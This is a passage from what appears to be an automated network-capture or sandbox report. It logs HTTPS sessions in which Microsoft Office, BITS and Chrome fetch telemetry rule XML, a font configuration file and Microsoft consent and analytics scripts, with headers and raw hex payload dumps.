                                                                                                                                                                                                2024-11-24 02:04:32 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                22192.168.2.54973313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:32 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                x-ms-request-id: eb93f719-b01e-0098-406c-3dcead000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020432Z-15b8b599d889fz52hC1TEB59as00000003vg000000001n66
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:32 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                23192.168.2.54973413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:32 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:32 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                x-ms-request-id: a69f297f-901e-002a-244c-3c7a27000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020432Z-15b8b599d885v8r9hC1TEB104g00000003qg00000000phwe
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:32 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                24192.168.2.54974923.218.208.109443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:47 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                2024-11-24 02:04:47 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                X-OSID: 2
                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                X-CCC: GB
                                                                                                                                                                                                Cache-Control: public, max-age=199724
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:47 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                25192.168.2.54975423.218.208.109443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:49 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                2024-11-24 02:04:49 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                Cache-Control: public, max-age=199700
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:49 GMT
                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                2024-11-24 02:04:49 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                26192.168.2.54975313.107.246.634436608C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:49 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                Host: wcpstatic.microsoft.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://learn.microsoft.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-24 02:04:50 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:49 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 52717
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Age: 25155
                                                                                                                                                                                                Cache-Control: max-age=43200
                                                                                                                                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-azure-ref: 20241124T020449Z-15b8b599d885ffrhhC1TEBtuv000000003v000000000aqmw
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:50 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                2024-11-24 02:04:50 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                                Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                                2024-11-24 02:04:50 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                                Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                27192.168.2.54975513.107.246.634436608C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:49 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                Host: js.monitor.azure.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://learn.microsoft.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-24 02:04:50 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:50 GMT
                                                                                                                                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                Content-Length: 207935
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                x-azure-ref: 20241124T020450Z-174c587ffdf8lw6dhC1TEBkgs800000003ug000000006f8k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L2_T1
                                                                                                                                                                                                X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:50 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                                Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                                Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
